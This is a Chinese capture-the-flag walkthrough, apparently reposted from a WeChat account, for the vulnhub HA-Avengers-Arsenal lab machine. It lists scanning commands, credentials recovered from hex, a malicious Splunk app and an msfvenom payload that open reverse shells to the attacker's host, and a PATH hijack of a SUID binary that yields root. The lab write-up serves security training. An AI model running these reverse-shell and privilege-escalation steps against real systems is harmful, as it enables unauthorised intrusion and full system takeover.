本周实践的是vulnhub的HA-Avengers-Arsenal镜像,
下载地址,https://download.vulnhub.com/ha/HA-Avengers-Arsenal.ova,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址是192.168.0.184,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.184,
发现靶机有80端口的http服务,以及8000端口的Splunk服务,
浏览器访问http://192.168.0.184,查看源码,获取到ravagers.html,
浏览器访问http://192.168.0.184/ravagers.html,
获取到十六进制编码,61 67 65 6e 74 3a 61 76 65 6e 67 65 72 73,
在线解码,获取到agent:avengers,
浏览器访问http://192.168.0.184:8000,用上面的用户名密码登录,
下载https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz,上传应用,
修改应用权限,
kali攻击机上开启反弹shell监听,nc -lvp 4444,
在Splunk上搜索,| revshell std 192.168.0.185 4444,
kali攻击机上获取到反弹shell,
kali攻击机上制作新的反弹shell脚本,
msfvenom -p cmd/unix/reverse_python lhost=192.168.0.185 lport=4455 R,
kali攻击机上开启新的反弹shell监听,nc -lvp 4455,
在靶机上执行脚本,kali攻击机上获取到新的反弹shell,
转成交互式shell,python -c 'import pty;pty.spawn("/bin/bash")',
查找root权限程序,find / -perm -u=s -type f 2>/dev/null,
获取到/opt/ignite,
执行发现/opt/ignite相当于调用了ifconfig,
进入临时目录,cd /tmp,
创建假的ifconfig,echo "/bin/bash" > ifconfig,
修改权限,chmod 777 ifconfig,
修改环境变量路径,export PATH=/tmp:$PATH,
再次执行/opt/ignite,获取到新的shell,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之HA-Avengers-Arsenal的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论